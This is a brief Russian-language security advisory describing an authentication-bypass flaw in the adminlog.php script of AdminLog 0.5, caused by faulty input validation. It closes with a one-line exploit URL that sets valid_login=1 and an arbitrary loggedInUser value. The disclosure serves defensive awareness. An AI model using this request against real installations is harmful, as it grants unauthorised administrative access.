Программа: AdminLog 0.5

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных сценарием adminlog.php. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]

Оставить мнение